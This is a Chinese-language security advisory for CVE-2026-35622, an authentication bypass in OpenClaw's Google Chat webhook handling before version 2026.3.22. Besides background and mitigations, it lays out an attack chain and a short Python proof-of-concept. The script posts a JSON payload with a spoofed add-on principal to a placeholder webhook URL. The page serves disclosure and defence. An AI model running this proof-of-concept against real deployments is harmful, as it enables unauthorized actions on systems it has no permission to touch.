CVE-2026-35622 CVSS 5.9 中危

CVE-2026-35622 OpenClaw身份验证绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35622

漏洞类型

认证绕过

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.22 之前的版本中存在严重的身份验证绕过漏洞。该漏洞源于 Google Chat app-url webhook 处理逻辑缺陷，错误接受了预期部署绑定之外的插件主体。攻击者可利用此漏洞，通过提供非部署的插件主体来绕过 webhook 身份验证机制，无需用户交互即可通过 Google Chat 集成执行未经授权的操作，威胁系统安全。

技术细节

该漏洞的根本原因在于 OpenClaw 处理 Google Chat app-url webhook 时的身份验证逻辑存在缺陷。正常情况下，webhook 端点应严格验证请求来源的合法性，仅接受特定部署绑定内的请求。然而，受影响版本未能严格校验请求来源的“add-on principals”（附加主体），导致系统错误地接受了未在预期部署范围内的主体标识。攻击者无需用户交互，仅凭低权限即可构造特定的 webhook 请求。通过在请求中注入伪造的或非预期的 add-on principal，攻击者可以欺骗服务器信任该请求。由于系统未能正确识别并拒绝此类非法主体，攻击者成功绕过了身份验证检查，进而利用 Google Chat 集成接口执行未授权的操作。这可能导致机密性泄露或完整性受损，攻击者能够以受害者权限执行一系列恶意操作。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用了存在漏洞的 OpenClaw 版本，并确定了其 Google Chat 集成的 Webhook 端点 URL。

STEP 2

构造载荷

攻击者构造一个包含恶意或非预期 'add-on principal' 的 JSON 数据包，模拟一个未被授权的插件主体。

STEP 3

发送请求

攻击者向目标 Webhook 端点发送 POST 请求，传递构造好的恶意载荷。

STEP 4

绕过验证

由于 OpenClaw 未正确校验 add-on principal 是否在预期部署绑定内，系统错误地信任了该请求。

STEP 5

执行操作

攻击者成功绕过身份验证，通过 Google Chat 集成执行未经授权的操作，如获取敏感信息或执行命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target webhook URL
# Replace with the actual target endpoint
target_url = "https://openclaw-instance.com/google-chat/webhook"

# The vulnerability allows bypassing authentication by using a non-deployment add-on principal.
# This payload simulates a request from an unauthorized principal.
payload = {
    "type": "MESSAGE",
    "event": {
        "appPrincipal": "attacker-controlled-principal-id", 
        "user": {
            "name": "users/123456789",
            "displayName": "Attacker"
        }
    },
    "message": {
        "text": "Execute unauthorized action"
    }
}

headers = {
    "Content-Type": "application/json",
    # Depending on the specific implementation, other headers might be needed
}

try:
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] PoC successful: Authentication bypassed.")
        print("[+] Response:", response.text)
    else:
        print("[-] PoC failed or patched.")
        print("[-] Status Code:", response.status_code)
except Exception as e:
    print(f"[-] Error occurred: {e}")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 OpenClaw 的 Google Chat 集成功能，或者在反向代理层配置规则，拦截包含非预期 add-on principal 标识的请求，以减少被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表